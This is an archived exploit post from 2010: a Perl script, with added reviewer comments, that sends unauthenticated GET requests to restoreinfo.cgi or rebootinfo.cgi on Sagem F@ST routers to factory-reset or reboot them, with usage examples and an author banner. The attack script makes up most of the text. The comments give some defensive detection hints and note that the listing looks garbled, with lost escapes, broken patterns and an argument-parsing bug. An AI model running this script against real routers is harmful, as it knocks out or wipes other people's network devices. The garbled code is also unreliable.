
Sagem Routers Remote Auth bypass Exploit

Posted on 04 March 2010

========================================
Sagem Routers Remote Auth bypass Exploit
========================================
#!/usr/bin/perl
# Exploit Title: Sagem routers Remote auth bypass Exploit
# Date: 04/03/2010
# Author: AlpHaNiX
# Software Link: null
# Version: Sagem Routers F@ST (1200/1240/1400/1400W/1500/1500-WG/2404
# Tested on: Sagem F@ST 2404
# Code :
#
# NOTE(review): Proof-of-concept for the claim that the web management
# interface of the Sagem F@ST models listed above answers restoreinfo.cgi and
# rebootinfo.cgi for a client that has not authenticated. Each run sends one
# plain GET with no credentials, cookies or custom headers.
#
# NOTE(review): "Success" is inferred only from the response body matching
# the micro_httpd "401 Unauthorized" page. Nothing in the script confirms that
# the device actually reset or rebooted, so the "Authentication bypassed"
# message is unverified output, not evidence.
#
# NOTE(review): Defensive reading. Where request logs or captures exist,
# look for GETs to /restoreinfo.cgi or /rebootinfo.cgi that carry no
# Authorization header; this client leaves LWP::UserAgent's default
# libwww-perl User-Agent in place. Keep the management interface unreachable
# from untrusted networks. The page names no fixed firmware; confirm the
# status of a given model with the vendor.
#
# NOTE(review): The listing is kept as extracted from the page. Escape
# sequences and line breaks inside strings and patterns appear to have been
# lost, so it is not expected to parse as printed. There is no
# "use strict" / "use warnings"; $ip, $ipz and $function are undeclared
# package globals shared between the subs and the main body.

use HTTP::Request;
# HTTP::Headers is loaded but not referenced anywhere in the visible code.
use HTTP::Headers;
use LWP::UserAgent;

# Runs the shell command "cls" (the Windows console clear); the result is
# not checked.
system('cls');

# Print the usage text: what the target argument must be, the affected model
# list, and two example invocations. Takes no arguments (empty prototype).
sub help() { print " [X] the target must be sagem rooter main ip adress ". "[X] affected Versions : Sagem Routers F@ST (1200/1240/1400/1400W/1500/1500-WG/2404) ". "[X] Usage : perl $0 --function ip ". "[X] Example : ./exploit.pl<http://exploit.pl> --reset 192.168.1.1 ". "[X] Example : ./exploit.pl<http://exploit.pl> --reboot 192.168.1.1 "; }

# Print the author/contact banner. Takes no arguments (empty prototype).
sub header() { print " [+]====================================[+] ". "[+] Sagem routers Remote Auth bypass [+] ". "[+] Found And Exploit By AlpHaNiX [+] ". "[+] Contact : AlpHa[at]Hacker[dot]Bz [+] ". "[+] HomePage : NullArea.Net [+] ". "[+]====================================[+] " }

# Request <base URL>restoreinfo.cgi with a single unauthenticated GET and
# report the outcome. Reads the globals $ipz (base URL) and $ip (used only in
# the message); returns whatever the last print returns.
sub resetz() {
my $target = $ipz."restoreinfo.cgi" ;
my $request = HTTP::Request->new(GET=>$target);
my $useragent = LWP::UserAgent->new();
my $response = $useragent->request($request);
# All three body patterns must match: the 401 title (case-insensitive), the
# 401 heading, and the micro_httpd address footer. The HTTP status code itself
# is never inspected.
if($response->content =~ m/<HTML><HEAD><TITLE>401 Unauthorized</TITLE></HEAD>/i
&& $response->content =~ m/<BODY BGCOLOR="#cc9999"><H4>401 Unauthorized</H4>/
&& $response->content =~ m/<ADDRESS><A HREF="http://www.acme.com<http://www.acme.com>/software/micro_httpd/">micro_httpd</A></ADDRESS>/ )
{ print "[+] Authentication bypassed ! 
" ; print "[+] Exploited , $ip is restored" ; }
# Any other body (including a failed connection) falls through to this hint.
else { print "[+] Please make sure you entered real sagem router ip " ; } }

# Same flow as resetz(), but against <base URL>rebootinfo.cgi.
sub reboot() {
my $target = $ipz."rebootinfo.cgi" ;
my $request = HTTP::Request->new(GET=>$target);
my $useragent = LWP::UserAgent->new();
my $response = $useragent->request($request);
# Same three-pattern fingerprint of the micro_httpd 401 page as in resetz().
if($response->content =~ m/<HTML><HEAD><TITLE>401 Unauthorized</TITLE></HEAD>/i
&& $response->content =~ m/<BODY BGCOLOR="#cc9999"><H4>401 Unauthorized</H4>/
&& $response->content =~ m/<ADDRESS><A HREF="http://www.acme.com<http://www.acme.com>/software/micro_httpd/">micro_httpd</A></ADDRESS>/ )
{ print "[+] Authentication bypassed ! " ; print "[+] Exploited , $ip is rebooted" ; }
else { print "[+] Please make sure you entered real sagem router ip " ; } }

# Main body: exactly two command-line arguments are required; otherwise the
# banner and usage text are printed and the script exits (exit() with no
# argument, i.e. status 0).
if (@ARGV != 2) { header();help(); exit(); }
else{
# Walk @ARGV by index, record the requested action in $function and take $ip
# from @ARGV.
my $i=0;
foreach (@ARGV) {
if ($ARGV[$i] eq "--reboot"){$ip = $ARGV[$i+1];$function = 'reboot';}
if ($ARGV[$i] eq "--reset"){$ip = $ARGV[$i];$function = 'reset';}
$i++; }
# Build the base URL: append "/" when the value already carries a scheme,
# otherwise prefix "http://". The value is not validated in any other way.
if ($ip =~ /http:/// ) { $ipz = $ip."/"; } else { $ipz = "http://".$ip."/"}
header();
print "[+] Working on $ip .. ";
# Dispatch on the recorded action; an unrecognised option runs neither sub.
if($function eq 'reboot'){reboot()}
if($function eq 'reset'){resetz()}
}
# ~ - [ [ : Inj3ct0r : ] ]

 
